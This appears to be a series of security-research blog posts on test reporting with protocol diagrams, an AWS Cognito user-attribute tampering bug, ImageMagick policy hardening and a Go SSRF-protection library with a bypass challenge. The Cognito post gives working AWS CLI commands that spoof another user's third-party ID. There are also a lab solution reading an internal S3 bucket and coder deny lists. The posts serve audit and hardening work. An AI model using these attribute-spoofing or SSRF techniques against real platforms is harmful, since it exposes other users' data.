During Test Planning and Auditing

PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of their underlying logic. The role of each actor can be easily derived and used to build a test plan before diving into Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.

The following detailed examples are extracted from our testing activities:

SAML Response Double Spending. The SAML Response was sent two times and one of the submissions happened out of the flow frame

OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.

During Reporting

The major benefit from the research output was the combination of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports makes it possible to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

Black Box Testing - The description can refer to the relevant sequence numbers in the flow along with the observed behavior and flaws;
White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web-facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations that had issued a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:

The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing: tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web-facing platform. By doing so, the need for valid super-admin access to the internal application (authentication) and for a specific target-user access grant (authorization) was bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza. The extension was developed during his internship with 50% research time.

Tampering User Attributes In AWS Cognito User Pools

2023-01-24T00:00:00+01:00

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offers a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both cases, the end-user should receive the resulting JSON Web Token.

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then it allows users to modify something on their own UserPool entry with the previously inspected JWT.

The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.
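
When triaging tokens during an audit, the relevant claims can be read straight from the JWT payload. The sketch below decodes the payload without verifying the signature, which is enough for inspection but never for trust decisions, and checks for an access token carrying the aws.cognito.signin.user.admin scope seen in the example above. The function names are hypothetical.

```python
import base64
import json


def decode_jwt_payload(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = token.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)  # restore padding
    return json.loads(base64.urlsafe_b64decode(padded))


def allows_self_service_calls(token: str) -> bool:
    """True for access tokens carrying the Cognito user-admin scope."""
    claims = decode_jwt_payload(token)
    scopes = claims.get("scope", "").split()
    return (
        claims.get("token_use") == "access"
        and "aws.cognito.signin.user.admin" in scopes
    )
```

A token for which this returns True is a candidate for the attribute-editing tests described next.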

The user associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1 --access-token eyJra..[REDACTED SESSION JWT]

{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

Which User Attributes are associated with the user pool?
Which ones are editable with the JWT directly via AWS CLI?
- Among the editable ones, is the platform trusting such claims?
  - For what internal logic or functional flow?
  - How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within the App Integration for the User Pool in use (AWS Cognito).

By removing it, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please make sure to properly handle email and phone number verification in the Cognito context. Since they may contain unverified values, remember to apply the AttributesRequireVerificationBeforeUpdate setting.

Hands-On IaC Lab

Stay tuned for the next episode!

Resources

ImageMagick Security Policy Evaluator

2023-01-10T00:00:00+01:00

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo cultured from around the internet. This normally happens for two reasons:

Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy is regulating. While the architectural complexity and the granularity of options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available; however, as noted in the past, it is not always well configured.
ImageMagick supports over 100 major image file formats (not including sub-formats). The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both developers and security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, auditing is usually a manual task that can miss subtle bypasses undermining the strength of a policy. It’s also easy to set policies that appear to work, but offer no real security benefit. The tool’s checks are based on our research and are meant to help developers harden their policies, so that those policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed behavior: instead of disallowing a coder if at least one none-permission rule for it existed in the policy, it now respects the last rule in the policy that matches the coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying rights for all coders and then enabling only the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...
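The "last matching rule wins" behavior can be illustrated with a small Go model. This is only a sketch under simplifying assumptions: the `rule` type and both functions are hypothetical, only `*`, exact names and `{A,B}` lists are handled (ImageMagick's real glob matching is richer), and a coder with no matching rule is assumed to keep full rights.

```go
package main

import (
	"fmt"
	"strings"
)

// rule is a simplified stand-in for one <policy domain="coder" .../> entry.
type rule struct {
	rights  string // e.g. "none" or "read | write"
	pattern string // "*", a single name, or a brace list such as "{GIF,PNG}"
}

// matches reports whether a coder name is covered by a pattern.
// Only "*", exact names and "{A,B}" lists are modelled here, and the
// comparison is case sensitive.
func matches(pattern, coder string) bool {
	if pattern == "*" {
		return true
	}
	if strings.HasPrefix(pattern, "{") && strings.HasSuffix(pattern, "}") {
		for _, name := range strings.Split(pattern[1:len(pattern)-1], ",") {
			if strings.TrimSpace(name) == coder {
				return true
			}
		}
		return false
	}
	return pattern == coder
}

// effectiveRights walks the rules in file order and keeps the rights of the
// last rule that matches. Assumption: with no matching rule, the coder keeps
// full rights, as with an open policy.
func effectiveRights(rules []rule, coder string) string {
	rights := "read | write"
	for _, r := range rules {
		if matches(r.pattern, coder) {
			rights = r.rights
		}
	}
	return rights
}

func main() {
	allowlist := []rule{
		{"none", "*"},
		{"read | write", "{GIF,JPEG,PNG,WEBP}"},
	}
	for _, coder := range []string{"PNG", "PDF", "MSL"} {
		fmt.Printf("%s -> %s\n", coder, effectiveRights(allowlist, coder))
	}
}
```

With the two-rule allowlist, only the vetted coders end up with rights, because the deny-all rule is overridden solely for names listed in the later rule.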

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case sensitive. Coders and modules must always be upper-case in the policy (e.g. “EPS” not “eps”).

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads, it’s convenient to search for “oom” or similar keywords in the recently opened issues on the library’s GitHub repository. This is a problem, since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be exposed to this kind of attack. Because of this, the tool also reports if reasonable limits are not explicitly set by the policy.
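As a rough illustration of this kind of check, the Go sketch below parses a policy file and lists resource limits that are not set. The `expectedLimits` list and the function name are assumptions made for the example; they are not the evaluator's actual rule set.

```go
package main

import (
	"encoding/xml"
	"fmt"
)

// policy mirrors the attributes used by <policy .../> entries.
type policy struct {
	Domain string `xml:"domain,attr"`
	Name   string `xml:"name,attr"`
	Value  string `xml:"value,attr"`
}

// policyMap maps the <policymap> root element.
type policyMap struct {
	Policies []policy `xml:"policy"`
}

// expectedLimits is an illustrative list of resource names to look for.
var expectedLimits = []string{"memory", "map", "area", "disk", "width", "height", "time"}

// missingLimits returns the expected resource limits that the policy
// does not explicitly set.
func missingLimits(policyXML []byte) ([]string, error) {
	var pm policyMap
	if err := xml.Unmarshal(policyXML, &pm); err != nil {
		return nil, err
	}
	set := make(map[string]bool)
	for _, p := range pm.Policies {
		if p.Domain == "resource" && p.Value != "" {
			set[p.Name] = true
		}
	}
	var missing []string
	for _, name := range expectedLimits {
		if !set[name] {
			missing = append(missing, name)
		}
	}
	return missing, nil
}

func main() {
	sample := []byte(`<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="coder" rights="none" pattern="*"/>
</policymap>`)
	missing, err := missingLimits(sample)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Println("resource limits not set:", missing)
}
```

A real audit would also judge whether each value is reasonable for the workload, which this sketch does not attempt.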

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml
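The same search can be scripted, for instance as part of a deployment check. The following Go sketch is one possible equivalent of the find command above; the function names are made up for the example, and it defaults to the current directory, so pass `/` as the first argument to mirror the command.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// isPolicyFile mimics `-iname policy.xml`: a case-insensitive match on the
// base name only.
func isPolicyFile(path string) bool {
	return strings.EqualFold(filepath.Base(path), "policy.xml")
}

// findPolicyFiles walks root and collects every policy.xml it can reach.
// Unreadable directories are skipped rather than treated as fatal.
func findPolicyFiles(root string) ([]string, error) {
	var found []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil // permission denied, vanished entry, etc.
		}
		if !d.IsDir() && isPolicyFile(path) {
			found = append(found, path)
		}
		return nil
	})
	return found, err
}

func main() {
	root := "."
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	files, err := findPolicyFiles(root)
	if err != nil {
		fmt.Fprintln(os.Stderr, "walk failed:", err)
		os.Exit(1)
	}
	for _, f := range files {
		fmt.Println(f)
	}
}
```

Finding more than one file does not tell you which one is in effect; the identify command shown later in this post remains the way to confirm that.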

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap>
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

safeurl for Go

2022-12-13T00:00:00+01:00

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF in numerous programming languages exist, Go didn’t have an easy to use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does `safeurl` Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via the safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

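package main

import (
    "fmt"

    "github.com/doyensec/safeurl"
)

func main() {
    // Build a client with the library's default configuration.
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        // fmt.Errorf only builds an error value, so print the error instead.
        fmt.Printf("request returned an error: %v\n", err)
        return
    }
    defer resp.Body.Close()

    // read response body
}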

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

allowed traffic only for ports 80 and 443
allowed traffic which uses HTTP or HTTPS protocols
blocked traffic to private IP addresses
blocked IPv6 traffic to any address
mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemes the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR ranges the application is allowed to connect to
BlockedCIDR             - list of CIDR ranges the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure other standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single scheme:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// Incorrect: each call overwrites the previous one, so this configuration only allows traffic to the last port set (443)
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the hostname resolves to an allowed destination. However, at the time-of-use (TOU), it resolves to a completely different IP address.

DNS rebinding protection in safeurl is accomplished by performing the allow/block list validations on the actual IP address which will be used to make the HTTP request. This is achieved by utilizing Go’s net.Dialer type and its Control hook. As stated in the official documentation:

// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IP validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. If a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {

return func(network, address string, _ syscall.RawConn) error {
	// [...]
	if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	return nil
}
}
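To show how such a hook plugs into a standard client, here is a minimal standard-library sketch. It is not safeurl's implementation: `isForbidden`, `control` and `newClient` are hypothetical names, and the IP checks are far coarser than the library's allow/block lists.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"syscall"
	"time"
)

var errBlockedIP = errors.New("destination IP is not allowed")

// isForbidden is an illustrative check covering loopback, private,
// link-local and unspecified addresses only.
func isForbidden(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()
}

// control runs after name resolution, on the literal address that is about
// to be dialed, so a rebinding DNS answer cannot slip past the check.
func control(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host)
	if ip == nil || isForbidden(ip) {
		return fmt.Errorf("%w: %s", errBlockedIP, host)
	}
	return nil
}

// newClient returns an http.Client whose connections all go through control.
func newClient() *http.Client {
	dialer := &net.Dialer{Timeout: 5 * time.Second, Control: control}
	return &http.Client{
		Transport: &http.Transport{DialContext: dialer.DialContext},
		Timeout:   10 * time.Second,
	}
}

func main() {
	// The dial is rejected inside the hook before any connection is made.
	_, err := newClient().Get("http://127.0.0.1:8080/flag")
	fmt.Println("request error:", err)
}
```

Because the check sees the resolved address rather than the hostname, it does not matter what a separate, earlier DNS lookup returned.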

Help Us Make `safeurl` Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

“Given enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}

If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancement ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

Let's speak AJP

2022-11-15T00:00:00+01:00

Introduction

